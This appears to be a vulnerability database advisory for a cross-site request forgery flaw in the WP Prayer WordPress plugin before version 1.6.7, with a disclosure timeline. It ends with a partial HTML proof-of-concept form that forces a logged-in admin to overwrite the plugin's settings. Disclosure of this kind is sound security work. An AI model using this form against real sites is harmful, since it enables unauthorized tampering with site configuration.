WP Prayer < 1.6.7 - Arbitrary Plugin Settings Update via CSRF

ID WPEX-ID:E4F17C7B-06A6-469D-A128-27A51E36493D
Type wpexploit
Reporter wpvulndb
Modified 2021-06-13T06:05:02


The plugin did not properly check for CSRF in some of its module functions, allowing attacker to make logged in admin change all plugin's settings (including the email settings) for example. v1.6.6 fixed most of CSRF checks, but the one in model.email_settings.php was improperly fixed (bypass still possible by providing a dummy nonce) Timeline: May 25th, 2021 - Vendor contacted May 31st, 2021 - Escalated to WP due to unresponsive vendor June 1st, 2021 - WP Investigating June 7th, 2021, v1.6.6 released, fixing the logic expect in model.email_settings.php. WP notified again about it June 13th, 2021 - v1.6.7 released, fixing the remaining CSRF issue

    <form action="https://example.com/wp-admin/admin.php?page=wpe_manage_settings" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="wpe_prayer_form_title" value="CSRF Attack" />
      <input type="hidden" name="wpe_prayer_list_title" value="" />
      <input type="hidden" name="wpe_praise_list_title" value="" />
      <input type="hidden" name="wpe_num_prayer_per_page" value="" />
      <input type="hidden" name="wpe_prayer_btn_color" value="" />
      <input type="hidden" name="wpe_prayer_btn_text_color" value="" />
      <input type="hidden" name="wpe_pray_btn_color" value="" />
      <input type="hidden" name="wpe_pray_text_color" value="" />
      <input type="hidden" name="wpe_terms_and_condition" value="" />
      <input type="hidden" name="wpe_num_of_characters_in_message" value="" />
      <input type="hidden" name="wpe_prayer_Site_Key" value="" />
      <input type="hidden" name="wpe_prayer_secret_key" value="" />
      <input type="hidden" name="wpe_prayer_time_interval" value="" />
      <input type="hidden" name="wpe_categorylist" value="Deliverance,Generational Healing,Inner Healing,Physical Healing,Protection,Relationships,Salvation,Spiritual Healing" />
      <input type="hidden" name="wpe_fetch_req_from" value="all" />
      <input type="hidden" name="wpe_save_settings" value="Save Settings" />
      <input type="hidden" name="operation" value="save" />
      <input type="hidden" name="page_options" value="wpe_api_key,wpe_scripts_place" />
      <input type="submit" value="Submit request" />